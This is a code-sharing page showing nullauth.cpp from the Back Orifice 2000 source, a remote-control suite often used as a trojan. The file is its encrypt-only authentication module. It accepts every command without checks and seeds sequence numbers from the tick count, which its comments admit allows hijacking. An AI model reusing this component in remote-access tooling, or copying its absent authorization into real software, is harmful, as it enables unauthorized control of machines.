开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 远程控制编程 > 查看源码
nullauth.cpp
资源名称:bo2ksrc.zip [点击查看]
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:10k
源码类别:

远程控制编程

开发平台:

WINDOWS

nullauth.cpp:源码内容
  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  4.     This program is free software; you can redistribute it and/or modify
  5.     it under the terms of the GNU General Public License as published by
  6.     the Free Software Foundation; either version 2 of the License, or
  7.     (at your option) any later version.
  9.     This program is distributed in the hope that it will be useful,
  10.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.     GNU General Public License for more details.
  14.     You should have received a copy of the GNU General Public License
  15.     along with this program; if not, write to the Free Software
  16.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  18. The author of this program may be contacted at dildog@l0pht.com. */
  20. // NULL Authentication Module: Is only responsible for encryption of data
  21. // not user authentication. Assumes all users log in as 'r00t'.
  22. #include<windows.h>
  23. #include<winsock.h>
  24. #include<auth.h>
  25. #include<iohandler.h>
  26. #include<nullauth.h>
  27. #include<config.h>
  29. AUTH_HANDLER g_NullAH;
  31. #pragma pack(push,1)
  33. typedef struct {
  34. int nUserId;
  35. DWORD dwSeq;
  36. DWORD dwRemoteSeq;
  37. } NULLAUTH_INTERNAL;
  39. typedef struct {
  40. DWORD dwTag;
  41. DWORD dwSeq;
  42. } SEQ_HDR;
  44. #define AUTH_TAG 0xCDC31337
  45. #define AUTH_TIMEOUT 5000
  47. #pragma pack(pop)
  49. int _cdecl NULLAUTH_Insert(void)
  50. {
  51. return 0;
  52. }
  54. int _cdecl NULLAUTH_Remove(void)
  55. {
  56. return 0;
  57. }
  59. char * _cdecl NULLAUTH_Query(void)
  60. {
  61. return "NULLAUTH: Single User / Encrypt Only";
  62. }
  65. void * _cdecl NULLAUTH_OnListen(CIOSocket *pSock, CEncryptionEngine *pEnc, int nUserId)
  66. {
  67. NULLAUTH_INTERNAL *pNAI=(NULLAUTH_INTERNAL *)malloc(sizeof(NULLAUTH_INTERNAL));
  68. if(pNAI==NULL) return NULL;
  70. pNAI->nUserId=nUserId;
  71. pNAI->dwSeq=0;
  72. pNAI->dwRemoteSeq=0;
  74. return pNAI;
  75. }
  77. static int SequenceEncryptPacket(CEncryptionEngine *pEnc, BYTE *pIn, int nInLen, BYTE **ppOut, int *pnOutLen, SEQ_HDR *pSeq)
  78. {
  79. // Create encrypt buffer
  80. int nSize=nInLen+sizeof(SEQ_HDR);
  81. BYTE *pDum=(BYTE *)malloc(nSize);
  82. if(pDum==NULL) {
  83. *ppOut=NULL;
  84. *pnOutLen=0;
  85. return -1;
  86. }
  88. // Copy data
  89. memcpy(pDum,pSeq,sizeof(SEQ_HDR));
  90. memcpy(pDum+sizeof(SEQ_HDR),pIn,nInLen);
  92. // Encrypt data
  93. BYTE *pData;
  94. int nDataLen;
  95. pData=pEnc->Encrypt(pDum,nSize,&nDataLen);
  96. free(pDum);
  97. if(pData==NULL) return -1;
  99. // Create output buffer
  100. nSize=nDataLen;
  101. pDum=(BYTE *)malloc(nSize);
  102. if(pDum==NULL) {
  103. pEnc->Free(pData);
  104. *ppOut=NULL;
  105. *pnOutLen=0;
  106. return -1;
  107. }
  109. // Copy data
  110. memcpy(pDum,pData,nSize);
  111. pEnc->Free(pData);
  113. // Return data
  114. *ppOut=pDum;
  115. *pnOutLen=nSize;
  117. return 0;
  118. }
  120. static int UnsequenceDecryptPacket(CEncryptionEngine *pEnc, BYTE *pIn, int nInLen, BYTE **ppOut, int *pnOutLen, SEQ_HDR *pSeq)
  121. {
  122. // Decrypt data
  123. BYTE *pDum;
  124. int nSize;
  125. pDum=pEnc->Decrypt(pIn,nInLen,&nSize);
  126. if(pDum==NULL) {
  127. *ppOut=NULL;
  128. *pnOutLen=0;
  129. return -1;
  130. }
  131. if(nSize<sizeof(SEQ_HDR)) {
  132. pEnc->Free(pDum);
  133. *ppOut=NULL;
  134. *pnOutLen=0;
  135. return -1;
  136. }
  138. // Create output buffer
  139. int nDataLen=nSize-sizeof(SEQ_HDR);
  140. BYTE *pData=(BYTE *)malloc(nDataLen);
  141. if(pData==NULL) {
  142. pEnc->Free(pDum);
  143. *ppOut=NULL;
  144. *pnOutLen=0;
  145. return -1;
  146. }
  148. // Copy data
  149. memcpy(pSeq,pDum,sizeof(SEQ_HDR));
  150. memcpy(pData,pDum+sizeof(SEQ_HDR),nDataLen);
  151. pEnc->Free(pDum);
  153. // Return data
  154. *ppOut=pData;
  155. *pnOutLen=nDataLen;
  157. return 0;
  158. }
  160. static void SequenceFreePacket(BYTE *pData)
  161. {
  162. free(pData);
  163. }
  166. void * _cdecl NULLAUTH_OnConnect(CIOSocket *pSock, CEncryptionEngine *pEnc, int nUserId)
  167. {
  168. NULLAUTH_INTERNAL *pNAI=(NULLAUTH_INTERNAL *)malloc(sizeof(NULLAUTH_INTERNAL));
  169. if(pNAI==NULL) return NULL;
  171. // Set up internal data structure
  172. pNAI->nUserId=nUserId;
  173. pNAI->dwSeq=GetTickCount(); // Should be a random number generator. Can be hijacked if the encryption key is known.
  175. // Prepare authentication packet
  176. SEQ_HDR hdr;
  177. hdr.dwTag=AUTH_TAG;
  178. hdr.dwSeq=(pNAI->dwSeq-1);
  180. int nSize=(GetTickCount() & 0xFF); // Attention would-be hackers: Initial packet size is somewhat related to initial sequence number.
  181. BYTE *pDum=(BYTE *)malloc(nSize);
  182. if(pDum==NULL) {
  183. free(pNAI);
  184. return NULL;
  185. }
  186. memset(pDum,69,nSize);
  188. // Sequence and encrypt packet
  189. BYTE *pOut;
  190. int nOutLen;
  191. if(SequenceEncryptPacket(pEnc,pDum,nSize,&pOut,&nOutLen,&hdr)<0) {
  192. free(pDum);
  193. free(pNAI);
  194. return NULL;
  195. }
  196. free(pDum);
  198. // Send initial packet
  199. if(pSock->Send(pOut,nOutLen)<=0) {
  200. SequenceFreePacket(pOut);
  201. free(pNAI);
  202. return NULL;
  203. }
  204. SequenceFreePacket(pOut);
  206. // Wait for authentication handshake
  207. DWORD dwTime=GetTickCount();
  208. while(pSock->Recv(&pDum,&nSize)<=0) {
  209. // Check for operation timeout
  210. if((GetTickCount()-dwTime)>=AUTH_TIMEOUT) {
  211. free(pNAI);
  212. return NULL;
  213. }
  214. }
  216. // Decrypt handshake packet
  217. if(UnsequenceDecryptPacket(pEnc,pDum,nSize,&pOut,&nOutLen,&hdr)<0) {
  218. pSock->Free(pDum);
  219. free(pNAI);
  220. return NULL;
  221. }
  222. pSock->Free(pDum);
  223. SequenceFreePacket(pOut);
  225. // Verify tag and store remote sequence number
  226. if(hdr.dwTag!=AUTH_TAG) {
  227. free(pNAI);
  228. return NULL;
  229. }
  230. pNAI->dwRemoteSeq=hdr.dwSeq+1;
  232. return pNAI;
  233. }
  235. void * _cdecl NULLAUTH_OnAccept(void *pInternal, CIOSocket *pSock, CEncryptionEngine *pEnc)
  236. {
  237. BYTE *pDum,*pOut;
  238. int nSize,nOutLen;
  239. SEQ_HDR hdr;
  241. NULLAUTH_INTERNAL *pNAI=(NULLAUTH_INTERNAL *)pInternal;
  242. NULLAUTH_INTERNAL *pNewNAI=(NULLAUTH_INTERNAL *)malloc(sizeof(NULLAUTH_INTERNAL));
  243. if(pNewNAI==NULL) return NULL;
  245. // Set up internal data structure
  246. pNewNAI->nUserId=pNAI->nUserId;
  247. pNewNAI->dwSeq=GetTickCount(); // Should be a random number generator. Can be hijacked if the encryption key is known.
  249. // Wait for initial packet
  250. DWORD dwTime=GetTickCount();
  251. while(pSock->Recv(&pDum,&nSize)<=0) {
  252. // Check for operation timeout
  253. if((GetTickCount()-dwTime)>=AUTH_TIMEOUT) {
  254. free(pNewNAI);
  255. return NULL;
  256. }
  257. }
  259. // Decrypt handshake packet
  260. if(UnsequenceDecryptPacket(pEnc,pDum,nSize,&pOut,&nOutLen,&hdr)<0) {
  261. pSock->Free(pDum);
  262. free(pNewNAI);
  263. return NULL;
  264. }
  265. pSock->Free(pDum);
  266. SequenceFreePacket(pOut);
  268. // Verify tag and store remote sequence number
  269. if(hdr.dwTag!=AUTH_TAG) {
  270. free(pNewNAI);
  271. return NULL;
  272. }
  273. pNewNAI->dwRemoteSeq=hdr.dwSeq+1;
  275. // Prepare handshake packet
  276. hdr.dwTag=AUTH_TAG;
  277. hdr.dwSeq=(pNewNAI->dwSeq-1);
  279. nSize=(GetTickCount() & 0xFF); // Attention would-be hackers: Initial packet size is somewhat related to initial sequence number.
  280. pDum=(BYTE *)malloc(nSize);
  281. if(pDum==NULL) {
  282. free(pNewNAI);
  283. return NULL;
  284. }
  286. // Sequence and encrypt packet
  287. if(SequenceEncryptPacket(pEnc,pDum,nSize,&pOut,&nOutLen,&hdr)<0) {
  288. free(pDum);
  289. free(pNewNAI);
  290. return NULL;
  291. }
  292. free(pDum);
  294. // Send initial packet
  295. if(pSock->Send(pOut,nOutLen)<=0) {
  296. SequenceFreePacket(pOut);
  297. free(pNewNAI);
  298. return NULL;
  299. }
  300. SequenceFreePacket(pOut);
  302. return pNewNAI;
  303. }
  305. int _cdecl NULLAUTH_GetUserID(void *pInternal)
  306. {
  307. if(pInternal==NULL) return -1;
  309. return ((NULLAUTH_INTERNAL *)pInternal)->nUserId;
  310. }
  312. int _cdecl NULLAUTH_OnClose(void *pInternal)
  313. {
  314. if(pInternal==NULL) return -1;
  316. free(pInternal);
  318. return 0;
  319. }
  321. int _cdecl NULLAUTH_OnRecv(void *pInternal, CEncryptionEngine *pEnc, BYTE *pData, int nDataLen, BYTE **ppInData, int *pnInDataLen)
  322. {
  323. BYTE *pDum;
  324. int nSize;
  325. SEQ_HDR hdr;
  326. NULLAUTH_INTERNAL *pNAI=(NULLAUTH_INTERNAL *)pInternal;
  327. if(ppInData==NULL || pnInDataLen==NULL || pData==NULL) 
  328. return -1;
  330. // This part does decryption and unsequencing
  332. // Decrypt packet
  333. if(UnsequenceDecryptPacket(pEnc,pData,nDataLen,&pDum,&nSize,&hdr)<0) {
  334. *ppInData=NULL;
  335. *pnInDataLen=0;
  336. return -1;
  337. }
  339. // Verify tag and remote sequence number
  340. if((hdr.dwTag!=AUTH_TAG) || (hdr.dwSeq!=pNAI->dwRemoteSeq))  {
  341. SequenceFreePacket(pDum);
  342. *ppInData=NULL;
  343. *pnInDataLen=0;
  344. return -1;
  345. }
  347. // Increment expected sequence number
  348. pNAI->dwRemoteSeq++;
  350. // Return decrypted packet
  351. *ppInData=pDum;
  352. *pnInDataLen=nSize;
  354. return 0;
  355. }
  357. int _cdecl NULLAUTH_OnSend(void *pInternal, CEncryptionEngine *pEnc, BYTE *pData, int nDataLen, BYTE **ppOutData, int *pnOutDataLen)
  358. {
  359. SEQ_HDR hdr;
  360. BYTE *pDum;
  361. int nSize;
  362. NULLAUTH_INTERNAL *pNAI=(NULLAUTH_INTERNAL *)pInternal;
  363. if(ppOutData==NULL || pnOutDataLen==NULL) return -1;
  365. // This part does encryption and sequencing
  367. // Create sequence header
  368. hdr.dwSeq=pNAI->dwSeq;
  369. hdr.dwTag=AUTH_TAG;
  371. // Encrypt packet
  372. if(SequenceEncryptPacket(pEnc,pData,nDataLen,&pDum,&nSize,&hdr)<0) {
  373. *ppOutData=NULL;
  374. *pnOutDataLen=0;
  375. return -1;
  376. }
  378. // Increment sequence number
  379. pNAI->dwSeq++;
  381. // Return encrypted packet
  382. *ppOutData=pDum;
  383. *pnOutDataLen=nSize;
  385. return 0;
  386. }
  388. void _cdecl NULLAUTH_Free(void *pInternal, BYTE *pBuffer)
  389. {
  390. if(pBuffer==NULL) return;
  392. SequenceFreePacket(pBuffer);
  393. }
  395. // Returns true if the user can execute said command.
  396. // Returns false if the user doesn't have priveleges.
  397. BOOL _cdecl NULLAUTH_ValidateCommand(int nUserId, int nCommand)
  398. {
  399. return TRUE;
  400. }
  402. AUTH_HANDLER *GetNullAuthHandler(void)
  403. {
  404. g_NullAH.pInsert=NULLAUTH_Insert;
  405. g_NullAH.pRemove=NULLAUTH_Remove;
  406. g_NullAH.pQuery=NULLAUTH_Query;
  407. g_NullAH.pOnListen=NULLAUTH_OnListen;
  408. g_NullAH.pOnConnect=NULLAUTH_OnConnect;
  409. g_NullAH.pOnAccept=NULLAUTH_OnAccept;
  410. g_NullAH.pGetUserID=NULLAUTH_GetUserID;
  411. g_NullAH.pOnClose=NULLAUTH_OnClose;
  412. g_NullAH.pOnRecv=NULLAUTH_OnRecv;
  413. g_NullAH.pOnSend=NULLAUTH_OnSend;
  414. g_NullAH.pFree=NULLAUTH_Free;
  415. g_NullAH.pValidateCommand=NULLAUTH_ValidateCommand;
  417. return &g_NullAH;
  418. }